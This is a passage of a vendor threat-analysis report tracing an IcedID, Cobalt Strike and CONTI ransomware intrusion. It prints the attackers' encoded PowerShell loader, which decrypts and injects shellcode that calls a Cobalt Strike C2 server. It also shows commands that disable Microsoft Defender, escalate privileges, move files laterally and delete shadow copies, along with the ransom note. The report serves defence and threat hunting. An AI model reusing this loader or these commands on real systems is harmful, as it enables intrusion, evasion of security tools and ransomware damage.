QBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA=

The decoded base64 command:

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“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”));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

The above script is base64 encoded and is also compressed with a GzipStream. By decoding the base64 format and decompressing the GzipStream with Gunzip, we observed the final stage of the PowerShell script.

Set-StrictMode -Version 2

$DoIt = @’

function func_get_proc_address {

Param ($var_module, $var_procedure)

$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(‘\\’)[-1].Equals(‘System.dll’) }).GetType(‘Microsoft.Win32.UnsafeNativeMethods’)

$var_gpa = $var_unsafe_native_methods.GetMethod(‘GetProcAddress’, [Type[]] @(‘System.Runtime.InteropServices.HandleRef’, ‘string’))

return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod(‘GetModuleHandle’)).Invoke($null, @($var_module)))), $var_procedure))

}

function func_get_delegate_type {

Param (

[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,

[Parameter(Position = 1)] [Type] $var_return_type = [Void]

)

$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(‘ReflectedDelegate’)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(‘InMemoryModule’, $false).DefineType(‘MyDelegateType’, ‘Class, Public, Sealed, AnsiClass, AutoClass’, [System.MulticastDelegate])

$var_type_builder.DefineConstructor(‘RTSpecialName, HideBySig, Public’, [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags(‘Runtime, Managed’)

$var_type_builder.DefineMethod(‘Invoke’, ‘Public, HideBySig, NewSlot, Virtual’, $var_return_type, $var_parameters).SetImplementationFlags(‘Runtime, Managed’)

return $var_type_builder.CreateType()

}

[Byte[]]$var_code = [System.Convert]::FromBase64String(’38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckuYIiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMUFdRQlMMSQ5HRlVOSk0NSVAjYw/ZJenhCgpDI35esYcBKAWcYJMSe+gtFePx5m0nWZMajTjb23LByk3Zf0nlRm6pqbkZyrHQrunJ83/NI2tMUFcZA0BMR0YNSVJWRlFaDUBMTi4pYExNTUZAV0pMTRkDQE9MUEYuKWJAQEZTVxkDCQwJLiliQEBGU1cOZk1ATEdKTUQZA0RZSlMPA0FRLil2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLdEpNR0xUUANtdwMWDRIYA3RsdBUXCgNiU1NPRnRGQWhKVwwWEBQNEBUDC2hrd25vDwNPSkhGA2RGQEhMCgNgS1FMTkYMFhANEw0RGxARDRQDcEJFQlFKDBYQFA0QFS4pI66UgbRb7ZNFbikzX0DzRUBaVneuvudTWoRQ5Vij4frDKh5k8Sdhn10cm4vEqJnjdS/2ZWMJ0Mz7jNje8UIZdNvWDepYmvNaJkwxif/LqljAF697+1NM9aWDNcm5+lXfG48VbiNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcERANEhMbDRYUDRIXGyN9DVul’)

for ($x = 0; $x -lt $var_code.Count; $x++) {

$var_code[$x] = $var_code[$x] -bxor 35

}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))

$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))

$var_runme.Invoke([IntPtr]::Zero)

‘@

If ([IntPtr]::size -eq 8) {

start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job

}

else {

IEX $DoIt

}

The purpose of the function “func_get_proc_address” is to use a .Net API to call Windows API function in memory from system.dll and import GetModuleHandle and GetProcAddress.

The [Byte[]]$var_code contains a base64 format string, which is the shellcode decrypted with xor using a key of 35.

[Byte[]]$var_code = [System.Convert]::FromBase64String(’38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckuYIiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMUFdRQlMMSQ5HRlVOSk0NSVAjYw/ZJenhCgpDI35esYcBKAWcYJMSe+gtFePx5m0nWZMajTjb23LByk3Zf0nlRm6pqbkZyrHQrunJ83/NI2tMUFcZA0BMR0YNSVJWRlFaDUBMTi4pYExNTUZAV0pMTRkDQE9MUEYuKWJAQEZTVxkDCQwJLiliQEBGU1cOZk1ATEdKTUQZA0RZSlMPA0FRLil2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLdEpNR0xUUANtdwMWDRIYA3RsdBUXCgNiU1NPRnRGQWhKVwwWEBQNEBUDC2hrd25vDwNPSkhGA2RGQEhMCgNgS1FMTkYMFhANEw0RGxARDRQDcEJFQlFKDBYQFA0QFS4pI66UgbRb7ZNFbikzX0DzRUBaVneuvudTWoRQ5Vij4frDKh5k8Sdhn10cm4vEqJnjdS/2ZWMJ0Mz7jNje8UIZdNvWDepYmvNaJkwxif/LqljAF697+1NM9aWDNcm5+lXfG48VbiNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcERANEhMbDRYUDRIXGyN9DVul’)

for ($x = 0; $x -lt $var_code.Count; $x++) {

$var_code[$x] = $var_code[$x] -bxor 35

}

The shellcode is injected in the allocated space (VirtualAlloc allocated the space in the memory for the shellcode). Finally, the shellcode is executed in the allocated space inside the memory.

In this case, the injection is a self-injection meaning the PowerShell instance that executed the command is injected and contains the shellcode.

The decrypted shellcode:

üè.`.å1Òd.R0.R..R..r(.·J&1ÿ1À¬<a|., ÁÏ

.ÇâðRW.R..B<.Ð[email protected]ÀtJ.ÐP.H..X .Óã<I.4..Ö1ÿ1À¬ÁÏ

.Ç8àuô.}ø;}$uâX.X$.Óf..K.X..Ó….Ð.D$$[[aYZQÿàX_Z..ë.]hnethwiniThLw&.ÿÕ1ÿWWWWWh:Vy§ÿÕé.[1ÉQQj.QQh».SPhW..ÆÿÕëp[1Ò[email protected]ëU.;ÿÕ.Æ.ÃP1ÿWWjÿSVh-..{ÿÕ.À..Ã.1ÿ.öt..ùë hªÅâ]ÿÕ.ÁhE!^1ÿÕ1ÿWj.QVPh·Wà.ÿÕ¿/9Çt·1ÿé..éÉ.è.ÿÿÿ/strap/[email protected],ú.ÊÂ))`]}.¤”.&¿C°1XË.6ÀÒÅN.z°9®.øøQâénú\jÆeM…:é.ó.ÊêÐ\îHost: code.jquery.com

Connection: close

Accept: */*

Accept-Encoding: gzip, br

User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36

.·¢.xΰfM

.|cÐfcyuT..Äpy§sÆ{.ÂÙà =GÒ.B¼~?¸¨ç.ºÀV.Õ[email protected]*óïدûýÒa:Wøõ.É{¹Ðy.o.ªÜè.{ã4.XØpoÖ. .ê.Ùvü8¬6Mhðµ¢VÿÕ[email protected]@WhX¤SåÿÕ.¹.ÙQS.çWh SVh…âÿÕ.ÀtÆ…Ã.ÀuåXÃè©ýÿÿ23.108.57.148^.x.

Accept: */*

Accept-Encoding: gzip, br

User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36

Cobalt Strike C2 server:
23.108.57[.]148

After execution of the fileless injection with PowerShell the threat actor performed additional injection to a remote process utilizing a Reflective Injection technique.

PowerShell opened Handle 0x143A to svchost.exe

Target process:
C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup

The injected svchost executed a PowerShell command, which performed a discovery operation.

Powershell -nop -exec bypass -EncodedCommand IgBbAFMAeQBzAHQAZQBtAC4ARABpAHIAZQBjAHQAbwByAHkAUwBlAHIAdgBpAGMAZQBzAC4AQQBjAHQAaQB2AGUARABpAHIAZQBjAHQAbwByAHkALgBEAG8AbQBhAGkAbgBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuACgAKQAuAEQAbwBtAGEAaQBuAEMAbwBuAHQAcgBvAGwAbABlAHIAcwAgAHwAIABTAGUAbABlAGMAdAAgAC0AcAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQAsAEkAUABBAGQAZAByAGUAcwBzACwATwBTAFYAZQByAHMAaQBvAG4AIgA=

Decoded command:

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select -property Name,IPAddress,OSVersion

Discovery

Back to the IcedID use case, several commands were detected that used by the Cobalt Strike session for discovery.

Discovery – TA007

“The adversary is trying to figure out your environment.

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.”

Discovery commands:

ipconfig /displaydns

ipconfig /all

nltest /domain_trusts

nltest /domain_trusts /all_trusts

systeminfo

net view /all /domain

wmic product get name,version

The above discovery command is used for listing the installed application on the host. We have observed threat actors using this command to discover which security applications they are dealing with.

The following command prints the installation package.

wmic product where “Name like ‘%Security Application%'” get Name, IdentifyingNumber

Impair defenses

After that, an attempt was made to uninstall the security application via the msiexec command:

msiexec.exe /x {[ security application package]} /qn

msiexec.exe /x {[ security application package]} /qn PASSWORD=[password]

In addition, an “Impair Defenses: Disable or Modify Tools” – T1562.001 technique was used to disable Microsoft Defender.

powershell New-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force

powershell Uninstall-WindowsFeature -Name Windows-Defender

powershell Set-MpPreference -DisableRealtimeMonitoring $true

powershell Uninstall-WindowsFeature -Name Windows-Defender

We have also observed privilege escalation in cases of Cobalt Strike activity by IcedID actors. The privilege escalation technique was acheived by GetSystem named piped impersonation to gain SYSTEM level privileges.

C:\Windows\system32\cmd.exe /c echo fbe08e37b62 > \\.\pipe\ab59fc

C:\Windows\system32\cmd.exe /c echo 99269f2c2e0 > \\.\pipe\4bba0e

C:\Windows\system32\cmd.exe /c echo fe08a9c446f > \\.\pipe\254573

C:\Windows\system32\cmd.exe /c echo 849b1389e6a > \\.\pipe\e215fc

C:\Windows\system32\cmd.exe /c echo [Random 11 characters] > \\.\pipe\[Random 6 characters]

Hunting tip: The above pattern of the GetSystem command could help to detects a privilege escalation attempt via named pipe. Also, the cmd command executes via services.exe process which could be the second indicator.

“Technique 1 creates a named pipe from Meterpreter. It also creates and runs a service that runs cmd.exe /c echo “some data” >\\.\pipe\. When the spawned cmd.exe connects to Meterpreter’s named pipe, Meterpreter can impersonate that security context. Impersonation of clients is a named pipes feature. The context of the service is SYSTEM, so when you impersonate it, you become SYSTEM.” – Cobalt Strike

After the threat actors enumerated the compromised host, mapped the inter-domain, disabled the security applications and gained SYSTEM privileges, the impact action is ready.

Final stage – CONTI infection

For the lateral movement and distribution of CONTI ransomware, threat actors used C$ share.

bitsadmin /transfer debjob /download /priority normal \\*\C$\Windows\md.dll C:\Windows\ GROUP_x86.dll

The above command is a LOLBin abuse by bitsadmin (used for managing background intelligent transfer) allowing the drop of the CONTI ransomware in the C$ share.

The execution method used to execute the CONTI DLL was regsvr32 command.

c:\windows\syswow64\regsvr32.exe /s C:\Windows\GROUP_x86.dll

 

Cynet 360 has a ransomware heuristics mechanism which one of his actions is to deploys decoy files, using this mechanism, we have observed an attempt of encryption routine by CONTI ransomware.

\device\harddiskvolume4\*\29.xlsx.ahiod

\device\harddiskvolume4\*\10.jpg.ahiod

\device\harddiskvolume4\*\14.xlsx.ahiod

\device\harddiskvolume4\*\15.jpg.ahiod

\device\harddiskvolume4\*\19.xlsx.ahiod

\device\harddiskvolume4\*\2.docx.ahiod

\device\harddiskvolume4\*\20.jpg.ahiod

\device\harddiskvolume4\*\24.xlsx.ahiod

\device\harddiskvolume4\*\25.jpg.ahiod

\device\harddiskvolume4\*\28.xls.ahiod

Inhibiting recovery commands detected during CONTI infection prevent system recovery by deleting volume shadow copies using vssadmin commands.

vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB

vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded

vssadmin.exe delete shadows /all /quiet

The threat actors executed the shadow copy deletion commands manually in most cases through bat files. This action of deleting shadow copies, not via the ransomware functionality itself, is a new development in the last incidents. We suspect that this action was performed manually to impede the detection of the inhibiting recovery technique. The shadow copy deletion commands are not directly related to the ransomware activity in this execution method and could be similar to legitimate activity originated from administrators and 3rd party applications.

CONTI utilizes Windows Restart Manager to ensure the data files are ready for encryption and there is no opened handle to the targeted files by other processes, and if so, the CONTI ransomware terminates these processes. The same technique is used by Sodinokibi (A.K.A REvil) and Ryuk ransomware.

CONTI Ransomware note:

Readme.txt
All of your files are currently encrypted by CONTI strain.

As you know (if you don’t – just “google it”), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly.

If you try to use any additional recovery software – the files might be damaged, so if you are willing to try – try it on the data of the lowest value.

To make sure that we REALLY CAN get your data back – we offer you to decrypt 2 random files completely free of charge.

You can contact our team directly for further instructions through our website :

TOR VERSION :

(you should download and install TOR browser first https://torproject.org)

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

HTTPS VERSION :

https://contirecovery.top/

YOU SHOULD BE AWARE!

Just in case, if you try to ignore us. We’ve downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible.

—BEGIN ID—

BPajYEaqdfDw5vci8nffGNO7URl8sq3U4hLbVnIFfMoIrf8yuwZDqq7SwLQggU1i

—END ID—

The CONTI group recently started using a “double extortion” technique, threatening victims that the exfiltrated data will be publicly leaked. This is a new trend amongst threat actors that used to focus ransomware campaigns and attacks solely on data encryption, but have evolved and created an additional leverage and source of income.

YOU SHOULD BE AWARE!

Just in case, if you try to ignore us. We’ve downloaded a pack of your internal data and are ready to publish it on our news website if you do not respond. So it will be better for both sides if you contact us as soon as possible.

CONTI sample analysis

MD5: a39aed88ea19af29a6876e74422e6e05

SHA-256: 5fe77db174a5206b5387e2b86255bd008966b44632925351d9b3983438004eb1

Imphash: 749dc5143e9fc01aa1d221fb9a48d5ea

SSDEEP: 3072:zKA/+tFAQDsFRa03B6jD3MIKud2nLxFVuyrUK8a1vFwS:WA/+t6QDsL3kjD3UjfVHmS

File type: Win32 DLL

Magic: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

Entropy: 6.454

Execution with regsvr32:

Parent Process:
c:\users\syswow64\regsvr32.exe /s C:\users\user\Desktop\CONTI.dll
Child Process Command:
/s C:\users\user\Desktop\CONTI.dll

File encryption:

CreateFile

QueryBasicInformationFile

CloseFile

 

Dive In

Ebook Free Download

Securing Your Organization’s Network on a Shoestring

How to protect your resource-constrained organization’s endpoints, networks, files and users without going bankrupt or losing sleep.

DOWNLOAD NOW
Ebook Free Download

Securing Your Organization’s Network on a Shoestring

How to protect your resource-constrained organization’s endpoints, networks, files and users without going bankrupt or losing sleep.

DOWNLOAD NOW
SOLUTION BRIEF

Automated Threat Discovery & Mitigation

Secure your all organizational assets with a single platform. Cynet 360 protects across all threat vectors, across all attack stages.

DOWNLOAD NOW
SOLUTION BRIEF

Automated Threat Discovery & Mitigation

Secure your all organizational assets with a single platform. Cynet 360 protects across all threat vectors, across all attack stages.

DOWNLOAD NOW
FREE TRIAL

Deploy Cynet in Minutes and Try it for 14 Days

Try Cynet’s easy-to-launch prevention, detection and response platform across your entire organization - free for 14 days!

START YOUR TRIAL